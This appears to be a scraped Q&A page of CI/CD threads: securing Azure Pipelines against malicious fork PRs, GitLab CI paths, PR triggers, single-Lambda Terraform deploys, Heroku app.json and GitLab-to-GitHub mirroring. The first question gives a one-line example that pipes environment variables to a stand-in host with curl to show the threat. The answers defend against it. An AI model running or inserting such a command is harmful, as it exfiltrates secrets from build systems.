Run security checks before running Azure Pipeline CI on public PR - continuous-integration

I have a public repo. Random GitHub users are free to create pull requests, and this is great.
My CI pipeline is described in a normal file in the repo called pipelines.yml (we use Azure pipelines).
Unfortunately this means that a random GitHub user is able to steal all my secret environment variables by creating a PR where they edit the pipelines.yml and add a bash script line with something like:
export | curl -XPOST 'http://pastebin-bla/xxxx'
Or run arbitrary code, in general. Right?
How can I verify that a malicious PR doesn't change at least some critical files?

How can I verify that a malicious PR doesn't change at least some critical files?
I am afraid there is no way to prevent a PR from changing specific critical files.
As a workaround, you can turn off automatic fork builds and instead use pull request comments to trigger builds of these contributions manually, which gives you an opportunity to review the code before triggering a build.
See the documentation section "Consider manually triggering fork builds" for more details.
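If you review fork PRs before triggering the build by hand, a small script can at least flag which changed files fall under paths you consider critical. This is only a sketch: the pattern list and the origin/main base ref are made-up assumptions, and it has to run somewhere the PR cannot alter (for example on the reviewer's machine), because a check that lives in the same pipeline file the PR can edit protects nothing.

```python
import subprocess
from fnmatch import fnmatchcase

# Hypothetical list of paths a fork PR should not change without review.
PROTECTED_PATTERNS = ["pipelines.yml", ".azure/*", "scripts/ci/*"]


def protected_changes(changed_files, patterns=PROTECTED_PATTERNS):
    """Return the changed paths that match any protected pattern."""
    return [
        path
        for path in changed_files
        if any(fnmatchcase(path, pattern) for pattern in patterns)
    ]


def changed_files(base_ref="origin/main"):
    """List files changed on the checked-out PR branch relative to base_ref.

    Assumes the PR head is checked out and base_ref has been fetched.
    """
    result = subprocess.run(
        ["git", "diff", "--name-only", f"{base_ref}...HEAD"],
        check=True, capture_output=True, text=True,
    )
    return result.stdout.splitlines()
```

With the PR branch checked out locally, protected_changes(changed_files()) returns the paths that deserve a closer look before you comment to start the build.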

Related

GitLab Custom CI configuration path and merge request

For one of our repositories we set "Custom CI configuration path" inside GitLab to a remote gitlab-ci.yml. We want to do this to prevent developers from changing the gitlab-ci.yml file (as protected files are only available in EE Premium and up). Apart from this purpose, the Custom CI configuration path feature should work for Merge Requests anyway.
Being in repo group1/repo1, we set the path to .gitlab-ci.yml@group1/repo1-ci
The repo1-ci repository exists and CI works correctly when we push to configured branches etc.
For Merge Request functionality GitLab tells us:
Detached merge request pipeline #123 failed for ...
Project group1/repo1-ci not found or access denied!
We added the developers to the repo1-ci repo with the Developer role so they can read the files. It does not help. In any case, our expectation is that the pipeline does not run with user permissions, so it should simply find the gitlab-ci.yml file.
Any ideas on this?
So our expectations were right, and it seems we have to take one important thing into account:
If a user interacts in the GitLab UI with the Merge Request features and you are using "Custom CI configuration path" for your gitlab-ci.yml file, please ensure that:
the user has at least read permission on that remote file, even if you moved it to another repo on purpose (e.g. to use enhanced file protection in PREMIUM/ULTIMATE, or to push/merge protect the branches for the Developer role)
the permission change has actually taken effect in the user's running session
The last part failed for our users; it only worked one day later. It seems they just continued working from their open merge request page, and GitLab checks accessibility from that session (using a cookie, token or something similar that was not updated with the access to the remote repo/file).
It works!

How can I remove Azure Pipeline Build from GitHub checks

I just set up CI/CD for a GitHub repo.
The CI build which validates a pull request is set up as a GitHub Action.
The CD build (which should run after the pull request is merged) is set up using Azure Pipelines, as I would like to use the generated artifacts as a trigger for a Release Pipeline, also in Azure Pipelines.
The only thing that's still bugging me is that the CD build is also triggered automatically for a pull request, and I can't figure out where I can configure those checks.
The checks currently running when a pull request is created are the following:
I want to get rid of the Continuous Delivery Build here.
I tried to configure the branch protection rules, but this has no effect.
On the Azure Pipelines side I completely disabled the triggers.
But this also has no visible effect.
I tested the "Disable pull request validation" option in the Triggers settings of the Azure DevOps pipeline. On my side it works well, and the build pipeline validation check is not displayed in the GitHub pull request.
First, check whether the source repo of the pipeline on which you set "Disable pull request validation" is the GitHub repo in which the pull request was created. Then try a few more times; it is possible that the settings are not applied immediately.
In addition, as a workaround you can opt out of pull request validation entirely by specifying pr: none in the YAML. Please refer to the official documentation.
# no PR triggers
pr: none

Deploying Single Lambda Function From CI/CD pipeline

I am working on an infrastructure and trying to figure out how to deploy just a single Lambda from a CI/CD pipeline.
Let's say a repo contains 20 Lambdas and you change only one of them. Instead of deploying all of them, I want to deploy just the changed one to cut down the deployment time.
One idea is to check the git diff to figure out which ones changed and deploy only those, but that doesn't seem like the right way to do it. I believe there is a more proper way.
I am using Terraform for now (moving to Serverless Framework). I know that Terraform and Serverless Framework hold state in an S3 bucket. However, in my case, when I run it through pipelines, even though there is a Terraform state and nothing in the state has changed, it still deploys the whole thing as far as I can tell (I might be wrong). I just want to clear my mind and see how people do this with their pipelines.
Since you seem to be asking about both Terraform and Serverless Framework here, I'm assuming you're looking for a general answer rather than specifically how this would be solved with a particular tool.
One way to solve this problem is to decouple your build process from your deploy process by adding a version selection mechanism in between. This just means that somewhere in your system you have a value that can be written by your build process and read by your deploy process which indicates what is the "current" artifact for each of your Lambda functions.
When your build process completes successfully, it can write the information about the artifact it built into the appropriate location, and then trigger your deployment process. Your deployment process will then read the artifact information and use it to decide what to deploy.
If you have made no changes to the current artifact metadata for a particular function then the deploy process can see that and not do anything. If a particular artifact is flawed in some way and you only notice once it's deployed, you can potentially set the artifact metadata back to the previous one and re-run the deployment process to roll back. If you choose a data store that retains historical versions, you'll also have a log of changes to the current artifact which might be useful to understand circumstances that lead to an incident.
Without getting into specifics it's hard to say more about this. For Terraform in particular, the artifact metadata store ought to be something that Terraform can read using a data source. To show a real example I'm going to just arbitrarily choose AWS SSM Parameter Store as a location for that artifact metadata store:
data "aws_ssm_parameter" "foo" {
  name = "FooFunctionArtifact"
}
locals {
  # For this example, we'll assume that the stored parameter is a JSON
  # string shaped like this:
  # {
  #   "s3_bucket": "awesomecorp-app-artifacts",
  #   "s3_key": "/awesomeapp/v1.2.0/function.zip"
  # }
  # The parameter's content is exposed through the "value" attribute.
  foo_artifact = jsondecode(data.aws_ssm_parameter.foo.value)
}
resource "aws_lambda_function" "foo" {
  function_name = "foo"
  s3_bucket     = local.foo_artifact.s3_bucket
  s3_key        = local.foo_artifact.s3_key
  # etc, etc
}
The technical details of this will vary a lot depending on your technology choices. If you don't use Terraform then you'll either use a feature similar to data sources in your other tool or you'd write some wrapper glue code that can itself retrieve the necessary information and pass it into the tool as an argument.
The main thing, regardless of technology choices, is that there is an explicit record somewhere of what is the latest artifact for each function, which is updated by your build step and read by your deploy step. This pattern can apply to other artifact types too, such as AMIs for EC2, docker images, etc.
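If you end up writing the wrapper glue code yourself, the comparison at the heart of this pattern fits in a few lines of Python. This is only an illustration under assumptions: the two dictionaries stand in for whatever metadata store you choose, and the function names, bucket and keys are made up.

```python
def functions_to_deploy(current, deployed):
    """Return the names whose current artifact differs from what is deployed.

    Both arguments map a function name to its artifact metadata, for example
    {"s3_bucket": "...", "s3_key": "..."}. A function that has never been
    deployed is missing from `deployed` and is therefore selected too.
    """
    return sorted(
        name
        for name, artifact in current.items()
        if deployed.get(name) != artifact
    )


# Hypothetical metadata written by the build step.
current = {
    "foo": {"s3_bucket": "awesomecorp-app-artifacts", "s3_key": "/awesomeapp/v1.2.0/foo.zip"},
    "bar": {"s3_bucket": "awesomecorp-app-artifacts", "s3_key": "/awesomeapp/v2.0.1/bar.zip"},
}
# Hypothetical record of what the last deployment used.
deployed = {
    "foo": {"s3_bucket": "awesomecorp-app-artifacts", "s3_key": "/awesomeapp/v1.2.0/foo.zip"},
    "bar": {"s3_bucket": "awesomecorp-app-artifacts", "s3_key": "/awesomeapp/v2.0.0/bar.zip"},
}

print(functions_to_deploy(current, deployed))  # ['bar']
```

Rolling back is then just a matter of writing the previous metadata back into the store and running the same comparison again.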
It seems you have added the labels terraform, serverless-framework (I'll call it sls), and aws-lambda, so any of them would work for you.
terraform - Terraform itself will take care of working out which Lambdas need to be updated. But it is not Lambda-friendly if you need to install related packages.
serverless framework (sls) - it is good for managing Lambda functions, but as a side effect, they have to be managed together with API Gateway. I am not sure whether the sls team has fixed this issue or not; this needs confirmation.
sls will take care of installing related packages.
The bad part is that sls can't show a diff (plan) of the resources to be deployed.
cloudformation - this is the AWS-owned Infrastructure as Code (IaC) tool for managing AWS resources, and you should be fine using it to manage the Lambda resources. You will hit the same issue as with Terraform: you have to install the related packages before deploying the stack.
The bad part is that cfn (cloudformation) doesn't have a diff feature either. Furthermore, it doesn't have proper tooling to manage its AWS CLI commands; you have to use something else, such as shell scripting, Ansible or even Terraform, to manage CloudFormation template updates.
aws cdk - the newest way is aws-cdk. It does have a diff feature, cdk diff, which is the most suitable for your current job, but it is a very new project and a lot of features are still waiting to be developed.
You can take these and weigh them against your team's skill set. Always choose the tools that you and your team are most confident with.

Generating app.json for Heroku pipeline without committing it to master

I am investigating adding an app.json file to my heroku pipeline to enable review apps.
Heroku offers the ability to generate one from your existing app setup, but I do not see any way to prevent it from automatically committing it to our repository's master branch.
I need to be able to see it before it gets committed to the master branch because we require at least two staff members to review all changes to the master branch (which triggers an automatic staging build) for SOC-2 security compliance.
Is there a way that I can see what it would generate without committing it to the repository?
I tried forking the repo and connecting the fork to its own pipeline, but because it did not have any of our Heroku add-ons or environment, it would not work for our production pipeline.
I am hesitant to just build the app.json file manually - it seems more prone to error. I would much prefer to get the automatically generated file and selectively remove items.
As a punchline to this story, I ended up investing enough time into the forked repository on its own pipeline to demonstrate a POC.
When you generate your app.json file, it should take you to a secondary screen that has the full app.json in plaintext at the bottom.
Why not open a PR with its contents in your project root? Once it's detected in the repository, Heroku shouldn't ask you to regenerate it again.

How to push from Gitlab to Github with webhooks

My Google-fu is failing me for what seems obvious if I can only find the right manual.
I have a Gitlab server which was installed by our hosting provider
The Gitlab server has many projects.
For some of these projects, I want that Gitlab automatically pushes to a remote repository (in this case Github) every time there is a push from a local client to Gitlab.
Like this: client --> gitlab --> github
Any tags and branches should also be pushed.
AFAICT I have 3 options:
1. Configure the local client with two remotes, and push simultaneously to Gitlab and Github. I want to avoid this because developers.
2. Add a git post-receive hook in the repository on the Gitlab server. This would be most flexible (I have sufficient Linux experience to write shell scripts as git hooks) and I have found documentation on how to do this, but I want to avoid this too because then the hosting provider will need to give me shell access.
3. Use webhooks in Gitlab. I am unfamiliar with even the very basics of webhooks, and I am unable to locate understandable documentation or even a simple step-by-step example. This is the documentation from Gitlab that I found and I do not understand it: http://demo.gitlab.com/help/web_hooks/web_hooks
I would appreciate good pointers, and I will summarize and document a solution when I find it.
EDIT
I'm using this Ruby code for a web hook:
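require 'json'
require 'sinatra/base'
class PewPewPew < Sinatra::Base
  # GitLab POSTs a JSON description of the push to this endpoint.
  post '/pew' do
    push = JSON.parse(request.body.read)
    puts "I got some JSON: #{push.inspect}"
  end
end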
Next: find out how to tell the gitlab server that it has to push a repository. I am going back to the GitLab API.
EDIT
I think I have an idea. On the server where I run the webhook, I pull from GitLab and then I push to Github. I can even do some "magic" (running tests, building jars, deploying to Artifactory,...) before I push to GitHub. In fact it would be great if Jenkins were able to push to a remote repository after a successful build; then I wouldn't need to write my own webhook, because I'm pretty sure Jenkins already provides a webhook for Gitlab, either natively or via a plugin. But I don't know. Yet.
EDIT
I solved it in Jenkins.
You can set more than one git remote in a Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
Option 1 would work of course.
Option 2 is possible but dangerous, because GitLab shell automatically symlinks hooks into repositories for you, and those are necessary for permission checks: https://github.com/gitlabhq/gitlab-shell/tree/823aba63e444afa2f45477819770fec3cb5f0159/hooks so I'd rather stay away from it.
Option 3: web hooks are not directly suitable. They make an HTTP request with a fixed format on certain events (in your case, push), not Git protocol requests.
Of course, you could write a server that consumes the hook, clones and pushes, but a service (single push and no deployment) or GitLab CI (already implements hook management) would be strictly better solutions:
services are the best option if someone implements one: they live in the source tree, would do a single push, and require no extra deployment overhead.
GitLab CI or other CIs like Jenkins are the best option currently available. They are essentially already-implemented servers for the webhooks, which automatically clone for you: all you have to do then is push from them.
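For reference, the "clone and push" step that such a hook consumer or CI job performs could look roughly like the Python sketch below. It is not a GitLab or Jenkins feature, just plain git driven from a script; the function names are made up, and it assumes git is installed and credentials for both remotes are already configured on the machine. The explicit refspecs limit the push to branches and tags.

```python
import os
import subprocess
import tempfile


def mirror_commands(source_url, target_url, workdir):
    """Build the git commands that copy all branches and tags to the target."""
    return [
        # A mirror clone fetches every ref from the source as a bare repository.
        ["git", "clone", "--mirror", source_url, workdir],
        # Force-update branches and tags on the target and prune deleted ones.
        ["git", "-C", workdir, "push", "--prune", target_url,
         "+refs/heads/*:refs/heads/*", "+refs/tags/*:refs/tags/*"],
    ]


def mirror(source_url, target_url):
    """Clone from the source and push to the target in a scratch directory."""
    with tempfile.TemporaryDirectory() as scratch:
        workdir = os.path.join(scratch, "repo.git")
        for command in mirror_commands(source_url, target_url, workdir):
            subprocess.run(command, check=True)
```

A fresh clone on every push is wasteful for large repositories; keeping the mirror clone around and fetching into it would be the obvious refinement.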
The keywords you want to Google for are "gitlab mirror github". That has led me to: Gitlab repository mirroring for instance. There seems to be no perfect, easy solution today.
Also this has already been proposed at the feature request forum at: http://feedback.gitlab.com/forums/176466-general/suggestions/4614663-automatic-push-to-remote-mirror-repo-after-push-to Always check there ;) Go and upvote the request.
The key difficulty now is how to store the push credentials.
I solved it in Jenkins. You can set more than one git remote in a Jenkins job. I used Git Publisher as a Post-Build Action and it worked like a charm, exactly what I wanted.
I added "-publisher" jobs that run after "" is built successfully. I could have done it in one job, but I decided to split it up. The build jobs are triggered by a web hook in GitLab; the publisher jobs are using a @daily schedule from the BuildResultTrigger plugin.

Resources